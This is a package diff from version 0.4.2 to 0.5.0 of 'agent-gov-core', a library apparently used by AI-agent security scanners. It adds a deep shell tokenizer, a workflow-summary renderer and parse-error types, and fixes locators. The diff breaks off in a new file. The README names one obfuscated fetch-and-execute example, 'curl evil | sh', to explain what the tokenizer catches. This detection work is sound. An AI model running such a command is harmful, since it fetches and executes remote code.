agent-gov-core 0.4.2 → 0.5.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/CHANGELOG.md CHANGED
Binary file
package/README.md CHANGED
@@ -66,14 +66,16 @@ The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json
66
66
  - `isSeverity(v)`, `isToolKind(v)`, `isNamespacedKind(v)` — type guards
67
67
  - `kind(tool, name)` — build a namespaced kind without hand-assembling the dotted string
68
68
  - `createFinding({tool, name, severity, message, ...})` — convenience constructor that calls `kind()` and `fingerprintFinding()` for you
69
- - `fingerprintFinding(finding)` — 16-character hex hash of `(kind, file, line, column)`. Stable across runs and message rewordings, so a meta-reviewer can dedupe
69
+ - `fingerprintFinding(finding)` — 16-character hex hash of `(kind, file, line, column, salientKey?)`. Stable across runs and message rewordings, so a meta-reviewer can dedupe. Pass `salientKey` (since v0.4.3) when multiple distinct findings can fire at the same site
70
70
  - `validateFinding(value)` — runtime check against `schemas/finding.schema.json`, returns `{ ok, errors[] }`
71
71
 
72
72
  ### Config readers
73
- - `readJsonObjectWithSource(path)` — JSONC reader, string-aware comment + trailing-comma stripping, position-preserving. Returns `{ value, json, text, parseError? }`; `value` and `json` reference the same parsed object `json` is kept as a deprecated alias.
73
+ - `readJsonObjectWithSource(path)` — JSONC reader, string-aware comment + trailing-comma stripping, position-preserving. Returns `{ value, json, text, parseError? }`. When the underlying parser provides a byte offset, `parseError` is a `ConfigParseError` carrying `line`/`column`/`rawOffset` instead of a raw `Error`.
74
74
  - `stripJsonComments(text)` — same logic exposed for in-memory text
75
- - `readTomlObject(path)` — TOML reader (sections, arrays of tables, inline tables, multi-line strings, dotted/quoted keys). Returns `{ value, toml, text, parseError? }`; `value` and `toml` reference the same parsed object — `toml` is kept as a deprecated alias.
76
- - `parseToml(text)` — same exposed for text
75
+ - `readTomlObject(path)` — TOML reader (sections, arrays of tables, inline tables, multi-line strings, dotted/quoted keys). Returns `{ value, toml, text, parseError? }`. Errors are also `ConfigParseError` with `line`/`column`/`rawOffset` when resolvable.
76
+ - `parseToml(text)` — same exposed for text; throws raw `Error` (file-level wrapping happens in `readTomlObject`)
77
+ - `ConfigParseError` — structured parse error with `line`, `column`, `rawOffset`, and `cause`. Lets downstream tools emit a `*.config_syntax_error` finding pointing at the exact spot.
78
+ - `lineColumnOfOffset(text, offset)` — convert a 0-based byte offset to 1-based `{ line, column }`. Useful when a hand-rolled scanner exposes byte positions and a `Finding.location` needs line/column.
77
79
 
78
80
  ### Line locators
79
81
  - `lineOfJsonKey(text, key, scope?)` — 1-based line of `"key":`, optionally scoped to a byte range
@@ -85,12 +87,14 @@ The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json
85
87
 
86
88
  ### Shell tokenization
87
89
  - `tokenizeShell(command)` — quote-aware split on `;`, `|`, `&&`, `||` plus trivial obfuscation neutralization (`c""url` → `curl`, `c\\url` → `curl`)
90
+ - `tokenizeShellDeep(command)` — recursively extracts commands nested inside `$(…)`, backticks, and `bash -c "…"` / `sh -c "…"` / `python -c "…"` payloads. Closes the obfuscation vector where an agent hides `curl evil | sh` inside `echo $(…)`. Single-quoted text is left untouched (literal, per shell semantics).
88
91
  - `getCommandHead(subcommand)` — extract the leading verb after tokenization
89
92
 
90
93
  ### GitHub Action helpers
91
94
  - `rankSeverity(s)` — numeric rank `low=1, medium=2, high=3, critical=4` (matches the schema's closed severity enum; there is no `none`)
92
95
  - `passesSeverityThreshold(s, threshold)`, `anyAtOrAbove(findings, threshold)` — fail-on plumbing
93
96
  - `emitFindingAnnotation(f)` — render a Finding as a `::warning file=…,line=…,title=…::…` GitHub workflow annotation
97
+ - `generateWorkflowSummary(findings, opts?)` — Markdown summary suitable for `$GITHUB_STEP_SUMMARY`. Groups findings by severity in collapsible `<details>` blocks so 100% of findings remain visible even when GHA's inline-annotation cap (~10 per level, 50 per run) silently drops the rest
94
98
 
95
99
  ### Test fixtures (`agent-gov-core/test-utils`)
96
100
  Secondary entry point used by consumer test suites. Zero overhead in production — only loaded when test files import it.
package/dist/action.d.ts CHANGED
@@ -28,4 +28,34 @@ export declare function anyAtOrAbove(findings: readonly Finding[], threshold: Se
28
28
  * // → '::error file=.github/workflows/ci.yml,line=12,title=[capability_echo.workflow_permission_write] high::Workflow grants contents: write to PR-triggered jobs.'
29
29
  */
30
30
  export declare function emitFindingAnnotation(finding: Finding): string;
31
+ export interface WorkflowSummaryOptions {
32
+ /** Top-level heading. Default: `Findings`. */
33
+ title?: string;
34
+ /** Cap per severity group; remaining count rendered as `(+N more)`. Default: 100. */
35
+ perSeverityLimit?: number;
36
+ /** Truncate message to this many characters (with `…` suffix). Default: 200. */
37
+ messageMaxLength?: number;
38
+ }
39
+ /**
40
+ * Render a Markdown summary of findings suitable for writing to
41
+ * `$GITHUB_STEP_SUMMARY`. GitHub Actions caps inline annotations (~10 per
42
+ * level, 50 per run) and silently drops the rest; the step summary has no
43
+ * such cap, so a Markdown table guarantees that 100% of findings are visible
44
+ * in the workflow's run summary page even when annotations are truncated.
45
+ *
46
+ * Findings are grouped by severity (critical → high → medium → low) inside
47
+ * collapsible `<details>` blocks. Each row carries file, line, kind, and a
48
+ * length-capped message. Pipe characters in message text are escaped so they
49
+ * don't break Markdown table rendering.
50
+ *
51
+ * @example
52
+ * import { generateWorkflowSummary } from 'agent-gov-core';
53
+ * import { appendFileSync } from 'node:fs';
54
+ *
55
+ * const md = generateWorkflowSummary(findings, { title: 'CapabilityEcho findings' });
56
+ * if (process.env.GITHUB_STEP_SUMMARY) {
57
+ * appendFileSync(process.env.GITHUB_STEP_SUMMARY, md);
58
+ * }
59
+ */
60
+ export declare function generateWorkflowSummary(findings: readonly Finding[], options?: WorkflowSummaryOptions): string;
31
61
  //# sourceMappingURL=action.d.ts.map
package/dist/action.js CHANGED
@@ -76,4 +76,102 @@ function escapeProperty(s) {
76
76
  .replace(/:/g, '%3A')
77
77
  .replace(/,/g, '%2C');
78
78
  }
79
+ /**
80
+ * Render a Markdown summary of findings suitable for writing to
81
+ * `$GITHUB_STEP_SUMMARY`. GitHub Actions caps inline annotations (~10 per
82
+ * level, 50 per run) and silently drops the rest; the step summary has no
83
+ * such cap, so a Markdown table guarantees that 100% of findings are visible
84
+ * in the workflow's run summary page even when annotations are truncated.
85
+ *
86
+ * Findings are grouped by severity (critical → high → medium → low) inside
87
+ * collapsible `<details>` blocks. Each row carries file, line, kind, and a
88
+ * length-capped message. Pipe characters in message text are escaped so they
89
+ * don't break Markdown table rendering.
90
+ *
91
+ * @example
92
+ * import { generateWorkflowSummary } from 'agent-gov-core';
93
+ * import { appendFileSync } from 'node:fs';
94
+ *
95
+ * const md = generateWorkflowSummary(findings, { title: 'CapabilityEcho findings' });
96
+ * if (process.env.GITHUB_STEP_SUMMARY) {
97
+ * appendFileSync(process.env.GITHUB_STEP_SUMMARY, md);
98
+ * }
99
+ */
100
+ export function generateWorkflowSummary(findings, options = {}) {
101
+ const title = options.title ?? 'Findings';
102
+ const perGroupLimit = options.perSeverityLimit ?? 100;
103
+ const messageMax = options.messageMaxLength ?? 200;
104
+ if (findings.length === 0) {
105
+ return `# ${title}\n\nNo findings.\n`;
106
+ }
107
+ const groups = {
108
+ critical: [],
109
+ high: [],
110
+ medium: [],
111
+ low: [],
112
+ };
113
+ for (const f of findings)
114
+ groups[f.severity].push(f);
115
+ const counts = {
116
+ critical: groups.critical.length,
117
+ high: groups.high.length,
118
+ medium: groups.medium.length,
119
+ low: groups.low.length,
120
+ };
121
+ const lines = [];
122
+ lines.push(`# ${title}`, '');
123
+ lines.push(`**Total**: ${findings.length} finding${findings.length === 1 ? '' : 's'} — ` +
124
+ `${counts.critical} critical, ${counts.high} high, ` +
125
+ `${counts.medium} medium, ${counts.low} low`);
126
+ lines.push('');
127
+ const severityOrder = ['critical', 'high', 'medium', 'low'];
128
+ for (const severity of severityOrder) {
129
+ const group = groups[severity];
130
+ if (group.length === 0)
131
+ continue;
132
+ const shown = group.slice(0, perGroupLimit);
133
+ const overflow = group.length - shown.length;
134
+ lines.push(`<details${severity === 'critical' || severity === 'high' ? ' open' : ''}>`);
135
+ lines.push(`<summary><strong>${group.length} ${severity}</strong></summary>`);
136
+ lines.push('');
137
+ lines.push('| File | Line | Kind | Message |');
138
+ lines.push('|------|------|------|---------|');
139
+ for (const f of shown) {
140
+ lines.push('| ' +
141
+ [
142
+ escapeMarkdownTableCell(f.location?.file ?? '—'),
143
+ f.location?.line ?? '—',
144
+ escapeMarkdownTableCell(f.kind),
145
+ escapeMarkdownTableCell(truncate(f.message, messageMax)),
146
+ ].join(' | ') +
147
+ ' |');
148
+ }
149
+ if (overflow > 0) {
150
+ lines.push(`| _(+${overflow} more ${severity} finding${overflow === 1 ? '' : 's'})_ | | | |`);
151
+ }
152
+ lines.push('');
153
+ lines.push('</details>');
154
+ lines.push('');
155
+ }
156
+ return lines.join('\n');
157
+ }
158
+ function truncate(s, max) {
159
+ if (s.length <= max)
160
+ return s;
161
+ return s.slice(0, Math.max(1, max - 1)) + '…';
162
+ }
163
+ function escapeMarkdownTableCell(s) {
164
+ // Escape HTML control characters so a finding message containing
165
+ // `</summary>` or `<h1>` can't break out of the `<details>` block we
166
+ // emit around each severity group. GitHub sanitizes script execution,
167
+ // but unescaped tags still let an attacker manipulate the visual layout
168
+ // of the workflow summary (collapse other groups, inject misleading
169
+ // headings, etc.).
170
+ return String(s)
171
+ .replace(/&/g, '&amp;')
172
+ .replace(/</g, '&lt;')
173
+ .replace(/>/g, '&gt;')
174
+ .replace(/\|/g, '\\|')
175
+ .replace(/\r?\n/g, ' ');
176
+ }
79
177
  //# sourceMappingURL=action.js.map
package/dist/finding.d.ts CHANGED
@@ -26,6 +26,16 @@ export interface Finding {
26
26
  location?: FindingLocation;
27
27
  /** Stable identifier for dedupe across runs. Recommended: hash of (kind, location, salient fields). */
28
28
  fingerprint?: string;
29
+ /**
30
+ * Optional discriminator that participates in the fingerprint hash. Set this
31
+ * when a single (kind, file, line) site can legitimately host multiple distinct
32
+ * findings — e.g. two suspicious imports on the same line, two MCP servers in
33
+ * the same JSON object, two npm dependencies declared in one package.json line.
34
+ * Without it, the meta-reviewer would dedupe them into one. Use a stable value
35
+ * that doesn't drift across reruns (package name, server name, rule id) — not
36
+ * a timestamp or counter.
37
+ */
38
+ salientKey?: string;
29
39
  /** Optional structured metadata; downstream meta-reviewers may inspect it. */
30
40
  data?: Record<string, unknown>;
31
41
  }
@@ -57,6 +67,12 @@ export interface CreateFindingSpec {
57
67
  detail?: string;
58
68
  location?: FindingLocation;
59
69
  data?: Record<string, unknown>;
70
+ /**
71
+ * See {@link Finding.salientKey}. Pass when the same (kind, file, line) site
72
+ * can produce multiple distinct findings that must not collapse to one
73
+ * fingerprint.
74
+ */
75
+ salientKey?: string;
60
76
  /** Optional explicit fingerprint. If omitted, {@link fingerprintFinding} is computed. */
61
77
  fingerprint?: string;
62
78
  }
package/dist/finding.js CHANGED
@@ -62,6 +62,8 @@ export function createFinding(spec) {
62
62
  finding.detail = spec.detail;
63
63
  if (spec.location !== undefined)
64
64
  finding.location = spec.location;
65
+ if (spec.salientKey !== undefined)
66
+ finding.salientKey = spec.salientKey;
65
67
  if (spec.data !== undefined)
66
68
  finding.data = spec.data;
67
69
  finding.fingerprint = spec.fingerprint ?? fingerprintFinding(finding);
@@ -99,6 +101,13 @@ export function fingerprintFinding(finding) {
99
101
  finding.location?.line ?? '',
100
102
  finding.location?.column ?? '',
101
103
  ];
104
+ // salientKey is appended ONLY when present. Appending `?? ''` would add a
105
+ // trailing pipe even for findings without salientKey, breaking the v0.4.2
106
+ // hash. This way pre-0.4.3 fingerprints stay stable for findings that
107
+ // never set salientKey, while new findings with one stay distinct.
108
+ if (finding.salientKey !== undefined) {
109
+ parts.push(finding.salientKey);
110
+ }
102
111
  return createHash('sha256').update(parts.join('|')).digest('hex').slice(0, 16);
103
112
  }
104
113
  const FINDING_ALLOWED_KEYS = new Set([
@@ -109,6 +118,7 @@ const FINDING_ALLOWED_KEYS = new Set([
109
118
  'detail',
110
119
  'location',
111
120
  'fingerprint',
121
+ 'salientKey',
112
122
  'data',
113
123
  ]);
114
124
  const LOCATION_ALLOWED_KEYS = new Set(['file', 'line', 'column', 'endLine', 'endColumn']);
@@ -145,6 +155,9 @@ export function validateFinding(value) {
145
155
  if (v.fingerprint !== undefined && typeof v.fingerprint !== 'string') {
146
156
  errors.push('fingerprint must be a string when present');
147
157
  }
158
+ if (v.salientKey !== undefined && typeof v.salientKey !== 'string') {
159
+ errors.push('salientKey must be a string when present');
160
+ }
148
161
  if (v.data !== undefined && (v.data === null || typeof v.data !== 'object' || Array.isArray(v.data))) {
149
162
  errors.push('data must be an object when present');
150
163
  }
package/dist/index.d.ts CHANGED
@@ -4,10 +4,12 @@ export type { JsonObjectWithSource } from './jsonc.js';
4
4
  export { readJsonObjectWithSource, stripJsonComments } from './jsonc.js';
5
5
  export type { TomlObjectWithSource } from './toml.js';
6
6
  export { readTomlObject, parseToml } from './toml.js';
7
+ export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
7
8
  export type { ByteRange } from './locators.js';
8
9
  export { lineOfJsonKey, lineOfJsonStringValue, lineOfTomlKey, } from './locators.js';
9
10
  export type { McpCommandSpec } from './mcp.js';
10
11
  export { normalizeMcpCommand } from './mcp.js';
11
- export { tokenizeShell, getCommandHead } from './shell.js';
12
- export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, } from './action.js';
12
+ export { tokenizeShell, tokenizeShellDeep, getCommandHead } from './shell.js';
13
+ export type { WorkflowSummaryOptions } from './action.js';
14
+ export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, generateWorkflowSummary, } from './action.js';
13
15
  //# sourceMappingURL=index.d.ts.map
package/dist/index.js CHANGED
@@ -1,8 +1,9 @@
1
1
  export { SEVERITIES, TOOL_KINDS, isSeverity, isToolKind, isNamespacedKind, kind, createFinding, fingerprintFinding, validateFinding, } from './finding.js';
2
2
  export { readJsonObjectWithSource, stripJsonComments } from './jsonc.js';
3
3
  export { readTomlObject, parseToml } from './toml.js';
4
+ export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
4
5
  export { lineOfJsonKey, lineOfJsonStringValue, lineOfTomlKey, } from './locators.js';
5
6
  export { normalizeMcpCommand } from './mcp.js';
6
- export { tokenizeShell, getCommandHead } from './shell.js';
7
- export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, } from './action.js';
7
+ export { tokenizeShell, tokenizeShellDeep, getCommandHead } from './shell.js';
8
+ export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, generateWorkflowSummary, } from './action.js';
8
9
  //# sourceMappingURL=index.js.map
package/dist/jsonc.js CHANGED
@@ -1,4 +1,5 @@
1
1
  import { readFileSync } from 'node:fs';
2
+ import { toConfigParseError } from './parse-error.js';
2
3
  /**
3
4
  * Strip `//` line comments, `/* ... *\/` block comments, and trailing commas from JSONC,
4
5
  * preserving byte offsets (replacement is space-filled, newlines preserved) so downstream
@@ -113,7 +114,7 @@ export function readJsonObjectWithSource(path) {
113
114
  return { value: parsed, json: parsed, text };
114
115
  }
115
116
  catch (err) {
116
- return { value: undefined, json: undefined, text, parseError: err };
117
+ return { value: undefined, json: undefined, text, parseError: toConfigParseError(text, err) };
117
118
  }
118
119
  }
119
120
  //# sourceMappingURL=jsonc.js.map
@@ -28,7 +28,9 @@ export declare function lineOfJsonKey(text: string, key: string, scope?: ByteRan
28
28
  * The value is JSON-encoded before matching so values containing backslashes
29
29
  * (e.g. Windows paths like `C:\Temp` written as `"C:\\Temp"` in JSON) are
30
30
  * located correctly. The scan ignores JSONC comments so a commented-out
31
- * matching value does not shadow the real one.
31
+ * matching value does not shadow the real one. The negative lookahead skips
32
+ * occurrences in key position (`"command":`) so a value matching a key name
33
+ * elsewhere in the document doesn't return the key's line.
32
34
  */
33
35
  export declare function lineOfJsonStringValue(text: string, value: string, scope?: ByteRange): number;
34
36
  /**
package/dist/locators.js CHANGED
@@ -26,11 +26,13 @@ export function lineOfJsonKey(text, key, scope) {
26
26
  * The value is JSON-encoded before matching so values containing backslashes
27
27
  * (e.g. Windows paths like `C:\Temp` written as `"C:\\Temp"` in JSON) are
28
28
  * located correctly. The scan ignores JSONC comments so a commented-out
29
- * matching value does not shadow the real one.
29
+ * matching value does not shadow the real one. The negative lookahead skips
30
+ * occurrences in key position (`"command":`) so a value matching a key name
31
+ * elsewhere in the document doesn't return the key's line.
30
32
  */
31
33
  export function lineOfJsonStringValue(text, value, scope) {
32
34
  const encoded = jsonEncodeForRegex(value);
33
- return findLineByRegex(text, new RegExp(`"${encoded}"`), scope);
35
+ return findLineByRegex(text, new RegExp(`"${encoded}"(?!\\s*:)`), scope);
34
36
  }
35
37
  /**
36
38
  * Convert a string to the form it would appear in JSON source bytes, then
@@ -56,43 +58,120 @@ export function lineOfTomlKey(text, dottedKey, scope) {
56
58
  const parts = splitTomlDottedKey(dottedKey);
57
59
  if (parts.length === 0)
58
60
  return 0;
59
- const leaf = parts[parts.length - 1];
60
- const prefix = parts.slice(0, -1);
61
61
  const lines = text.split(/\r?\n/);
62
62
  const inScope = scopeLineFilter(text, scope);
63
- // Find header range we're inside of.
64
- let inTargetTable = prefix.length === 0;
65
63
  let currentTable = [];
66
- const targetHeader = prefix.join('.');
64
+ // Track multi-line basic (`"""`) and literal (`'''`) string state. A leaf-key
65
+ // pattern can otherwise match against decoy text inside a multi-line string
66
+ // value — see lineOfTomlKey regression tests.
67
+ let inMultilineString = null;
67
68
  for (let i = 0; i < lines.length; i++) {
68
69
  const lineNumber = i + 1;
69
70
  const raw = lines[i];
71
+ const stateAtLineStart = inMultilineString;
72
+ inMultilineString = updateMultilineStringState(raw, inMultilineString);
73
+ // If we entered this line inside a multi-line string, never match. The key
74
+ // pattern there is part of a string literal, not a real assignment.
75
+ if (stateAtLineStart !== null)
76
+ continue;
70
77
  const trimmed = raw.trim();
71
78
  const headerMatch = /^\[\[?\s*([^\]]+?)\s*\]\]?\s*(#.*)?$/.exec(trimmed);
72
79
  if (headerMatch) {
73
80
  currentTable = splitTomlDottedKey(headerMatch[1]);
74
- inTargetTable = currentTable.join('.') === targetHeader;
75
81
  continue;
76
82
  }
77
- if (!inTargetTable)
78
- continue;
79
83
  if (trimmed === '' || trimmed.startsWith('#'))
80
84
  continue;
81
85
  if (!inScope(lineNumber))
82
86
  continue;
83
- // Match leaf key at start of line: bare, "quoted", or 'literal'
84
- const leafPattern = new RegExp(`^\\s*(?:${escapeForRegex(leaf)}|"${escapeForRegex(leaf)}"|'${escapeForRegex(leaf)}')\\s*(?:\\.|=)`);
85
- if (leafPattern.test(raw))
87
+ // Generalized dotted-key matching: if the current table is a strict
88
+ // prefix of (or equal to) the target dotted key, try matching the
89
+ // REMAINING dotted segments on this line. Covers all three cases:
90
+ // - Top-level (`a.b.c = 1` at root): currentTable=[] → match `a.b.c`
91
+ // - Inside a parent (`[a]\nb.c = 1`): currentTable=['a'] → match `b.c`
92
+ // - Inside the exact table (`[a.b]\nc = 1`): currentTable=['a','b'] → match `c`
93
+ const tableIsPrefix = currentTable.length <= parts.length &&
94
+ currentTable.every((seg, idx) => seg === parts[idx]);
95
+ if (!tableIsPrefix)
96
+ continue;
97
+ const remaining = parts.slice(currentTable.length);
98
+ if (remaining.length === 0)
99
+ continue;
100
+ // Remaining-as-dotted-key match (covers any depth ≥ 1). Build the
101
+ // regex from individual segments joined by `\s*\.\s*` so spaced dotted
102
+ // keys (`a . b . c = 1` — valid TOML) match as well as compact ones.
103
+ const segmentsPattern = remaining.map(escapeForRegex).join('\\s*\\.\\s*');
104
+ const dottedPattern = new RegExp(`^\\s*${segmentsPattern}\\s*=`);
105
+ if (dottedPattern.test(raw))
86
106
  return lineNumber;
87
- // Also: dotted key like `prefix.leaf = ...` defined at top-level
88
- if (prefix.length > 0 && currentTable.length === 0) {
89
- const dottedPattern = new RegExp(`^\\s*${escapeForRegex(dottedKey)}\\s*=`);
90
- if (dottedPattern.test(raw))
107
+ // If remaining is exactly the leaf, also try the quoted-leaf forms
108
+ if (remaining.length === 1) {
109
+ const leafKey = remaining[0];
110
+ const leafPattern = new RegExp(`^\\s*(?:${escapeForRegex(leafKey)}|"${escapeForRegex(leafKey)}"|'${escapeForRegex(leafKey)}')\\s*(?:\\.|=)`);
111
+ if (leafPattern.test(raw))
91
112
  return lineNumber;
92
113
  }
93
114
  }
94
115
  return 0;
95
116
  }
117
+ /**
118
+ * Walk a line and update multi-line string state.
119
+ *
120
+ * Inside a basic multi-line string (`"""…"""`), a backslash escapes the next
121
+ * character — so `\"""` is a literal `"""` inside the value, NOT the string's
122
+ * closing delimiter. The walker must skip the next character after each `\`
123
+ * or it'll terminate the string state early and start matching key patterns
124
+ * against text that's still inside the value.
125
+ *
126
+ * Literal multi-line strings (`'''…'''`) do not process escapes per TOML spec,
127
+ * so backslash is inert there.
128
+ */
129
+ function updateMultilineStringState(line, current) {
130
+ let state = current;
131
+ let pos = 0;
132
+ while (pos < line.length) {
133
+ if (state === '"""') {
134
+ // Inside a basic multi-line string — honor backslash escapes
135
+ if (line[pos] === '\\') {
136
+ pos += 2; // skip the backslash AND the next character
137
+ continue;
138
+ }
139
+ if (pos <= line.length - 3 && line.substr(pos, 3) === '"""') {
140
+ state = null;
141
+ pos += 3;
142
+ continue;
143
+ }
144
+ pos++;
145
+ continue;
146
+ }
147
+ if (state === "'''") {
148
+ // Literal multi-line — no escapes per spec
149
+ if (pos <= line.length - 3 && line.substr(pos, 3) === "'''") {
150
+ state = null;
151
+ pos += 3;
152
+ continue;
153
+ }
154
+ pos++;
155
+ continue;
156
+ }
157
+ // state === null
158
+ if (pos <= line.length - 3) {
159
+ const window = line.substr(pos, 3);
160
+ if (window === '"""') {
161
+ state = '"""';
162
+ pos += 3;
163
+ continue;
164
+ }
165
+ if (window === "'''") {
166
+ state = "'''";
167
+ pos += 3;
168
+ continue;
169
+ }
170
+ }
171
+ pos++;
172
+ }
173
+ return state;
174
+ }
96
175
  function scopeLineFilter(text, scope) {
97
176
  if (!scope)
98
177
  return () => true;
package/dist/mcp.js CHANGED
@@ -41,13 +41,47 @@ export function normalizeMcpCommand(spec) {
41
41
  }
42
42
  return parts.join('\n');
43
43
  }
44
- /** Strip `.cmd`/`.exe`/`.bat`/`.ps1` suffix and lowercase on Windows-style paths. */
44
+ /**
45
+ * Strip `.cmd`/`.exe`/`.bat`/`.ps1` suffix on Windows-style paths and
46
+ * lowercase those — Windows filesystem lookup is case-insensitive, so
47
+ * `NPX.CMD`, `npx.cmd`, and `npx` all refer to the same executable and
48
+ * should produce identical identity strings. POSIX paths (no backslash
49
+ * separator, no Windows suffix) keep their case because `./curl` and
50
+ * `./CURL` are genuinely different files there.
51
+ */
45
52
  function normalizeExecutable(cmd) {
46
53
  const trimmed = cmd.trim();
47
54
  const base = trimmed.replace(/\\/g, '/');
55
+ const hadWindowsSuffix = /\.(cmd|exe|bat|ps1)$/i.test(base);
48
56
  const withoutSuffix = base.replace(/\.(cmd|exe|bat|ps1)$/i, '');
49
- return withoutSuffix;
57
+ // Windows-shaped if the original used `\` separators or had a Windows
58
+ // executable suffix. In either case, case-fold for cross-machine identity.
59
+ const isWindowsShaped = hadWindowsSuffix || trimmed.includes('\\');
60
+ const cased = isWindowsShaped ? withoutSuffix.toLowerCase() : withoutSuffix;
61
+ // De-noise PATH-resolved runtimes: `/usr/bin/node` and `node` both run node.
62
+ // Only fold when the basename matches a known runtime so custom scripts at
63
+ // absolute paths (e.g. `/opt/internal/orchestrator.sh`) keep their identity.
64
+ const basename = cased.split('/').pop() ?? cased;
65
+ if (KNOWN_RUNTIMES.has(basename.toLowerCase())) {
66
+ return isWindowsShaped ? basename.toLowerCase() : basename;
67
+ }
68
+ return cased;
50
69
  }
70
+ /**
71
+ * Common runtime executables whose absolute-path location varies across
72
+ * machines (PATH lookup resolves them) but whose identity for MCP-config
73
+ * purposes is the runtime name itself. Conservative — only entries where
74
+ * basename collapse is provably safe across the platforms an MCP config
75
+ * might be authored on.
76
+ */
77
+ const KNOWN_RUNTIMES = new Set([
78
+ 'node', 'npx', 'npm', 'pnpm', 'yarn',
79
+ 'python', 'python3', 'pip', 'pip3', 'pipx', 'uvx', 'uv',
80
+ 'ruby', 'gem', 'bundle',
81
+ 'perl', 'cpan',
82
+ 'bash', 'sh', 'zsh', 'fish', 'powershell', 'pwsh',
83
+ 'deno', 'bun', 'tsx', 'ts-node',
84
+ ]);
51
85
  function normalizePath(p) {
52
86
  return p.trim().replace(/\\/g, '/').replace(/\/+$/, '');
53
87
  }
@@ -59,6 +93,22 @@ function normalizePath(p) {
59
93
  * (npx, uvx, pipx, node).
60
94
  */
61
95
  const NEUTRAL_BOOLEAN_FLAGS = new Set(['-y', '--yes']);
96
+ /**
97
+ * Flags universally treated as boolean (no value follows) by the runners we
98
+ * care about. Listed so `canonicalizeArgs` doesn't greedily pair them with the
99
+ * next positional argument, which would conflate `--verbose pkg` with
100
+ * `--verbose=pkg`. Unlike NEUTRAL_BOOLEAN_FLAGS these stay in the canonical
101
+ * form — they're load-bearing (different identity vs. their absence) but
102
+ * standalone.
103
+ *
104
+ * Conservative — only flags where "takes a value" is essentially never their
105
+ * meaning in any CLI we'd see in an MCP config.
106
+ */
107
+ const KNOWN_BOOLEAN_FLAGS = new Set([
108
+ '-v', '-V', '-q', '-h', '-d',
109
+ '--verbose', '--quiet', '--silent', '--debug', '--help', '--version',
110
+ '--force', '--dry-run', '--no-cache', '--no-color', '--no-progress', '--json',
111
+ ]);
62
112
  /**
63
113
  * Sort *neutral* flag/value pairs so reordering doesn't change identity, but
64
114
  * preserve the order of positional arguments (which are usually load-bearing —
@@ -87,6 +137,15 @@ function canonicalizeArgs(args) {
87
137
  flagPairs.push([a.slice(0, eq), a.slice(eq + 1)]);
88
138
  continue;
89
139
  }
140
+ // Known-boolean flags never consume the next argument, so `--verbose pkg`
141
+ // leaves `pkg` as a positional rather than collapsing into a fake pair.
142
+ // Without this guard, reordering ['--host', 'localhost', '--verbose', 'pkg']
143
+ // vs ['--verbose', '--host', 'localhost', 'pkg'] produced different
144
+ // canonical strings because `--verbose` greedily ate the next non-flag.
145
+ if (KNOWN_BOOLEAN_FLAGS.has(a)) {
146
+ flagPairs.push([a, null]);
147
+ continue;
148
+ }
90
149
  const next = filtered[i + 1];
91
150
  if (next !== undefined && !next.startsWith('-')) {
92
151
  flagPairs.push([a, next]);
@@ -0,0 +1,54 @@
1
+ /**
2
+ * Structured config-file parse error. Carries the 1-based line and column of
3
+ * the failure so consumers can emit a `*.config_syntax_error` Finding pointing
4
+ * at the exact spot without recomputing line numbers from the raw offset.
5
+ *
6
+ * Thrown nowhere directly — instead, {@link readJsonObjectWithSource} and
7
+ * {@link readTomlObject} populate the `parseError` field of their result with
8
+ * this type whenever they can resolve a byte offset from the underlying parser.
9
+ * When the underlying error lacks position info, the original `Error` is
10
+ * preserved unchanged.
11
+ *
12
+ * @example
13
+ * import { readTomlObject, ConfigParseError } from 'agent-gov-core';
14
+ * const { parseError } = readTomlObject('.codex/config.toml');
15
+ * if (parseError instanceof ConfigParseError) {
16
+ * emitFinding({
17
+ * kind: 'policy_mesh.config_syntax_error',
18
+ * location: { file: '.codex/config.toml', line: parseError.line, column: parseError.column },
19
+ * message: parseError.message,
20
+ * });
21
+ * }
22
+ */
23
+ export declare class ConfigParseError extends Error {
24
+ readonly line: number;
25
+ readonly column: number;
26
+ readonly rawOffset: number;
27
+ constructor(message: string, opts: {
28
+ line: number;
29
+ column: number;
30
+ rawOffset: number;
31
+ cause?: Error;
32
+ });
33
+ }
34
+ /** Convert a 0-based byte offset to 1-based line and column. */
35
+ export declare function lineColumnOfOffset(text: string, offset: number): {
36
+ line: number;
37
+ column: number;
38
+ };
39
+ /**
40
+ * Extract a byte offset from a parser error message. Both this library's TOML
41
+ * parser ("at offset N") and Node's `JSON.parse` ("at position N", or a
42
+ * `position` property on newer runtimes) use compatible-enough formats that
43
+ * one helper handles both.
44
+ *
45
+ * Returns `null` when no offset can be recovered — most semantic errors
46
+ * (duplicate-key, table redefinition) don't include one.
47
+ */
48
+ export declare function extractParseOffset(err: Error): number | null;
49
+ /**
50
+ * Wrap an arbitrary parser error into a {@link ConfigParseError} when offset
51
+ * recovery is possible; otherwise return the original error unchanged.
52
+ */
53
+ export declare function toConfigParseError(text: string, err: Error): Error;
54
+ //# sourceMappingURL=parse-error.d.ts.map
@@ -0,0 +1,85 @@
1
+ /**
2
+ * Structured config-file parse error. Carries the 1-based line and column of
3
+ * the failure so consumers can emit a `*.config_syntax_error` Finding pointing
4
+ * at the exact spot without recomputing line numbers from the raw offset.
5
+ *
6
+ * Thrown nowhere directly — instead, {@link readJsonObjectWithSource} and
7
+ * {@link readTomlObject} populate the `parseError` field of their result with
8
+ * this type whenever they can resolve a byte offset from the underlying parser.
9
+ * When the underlying error lacks position info, the original `Error` is
10
+ * preserved unchanged.
11
+ *
12
+ * @example
13
+ * import { readTomlObject, ConfigParseError } from 'agent-gov-core';
14
+ * const { parseError } = readTomlObject('.codex/config.toml');
15
+ * if (parseError instanceof ConfigParseError) {
16
+ * emitFinding({
17
+ * kind: 'policy_mesh.config_syntax_error',
18
+ * location: { file: '.codex/config.toml', line: parseError.line, column: parseError.column },
19
+ * message: parseError.message,
20
+ * });
21
+ * }
22
+ */
23
+ export class ConfigParseError extends Error {
24
+ line;
25
+ column;
26
+ rawOffset;
27
+ constructor(message, opts) {
28
+ super(message);
29
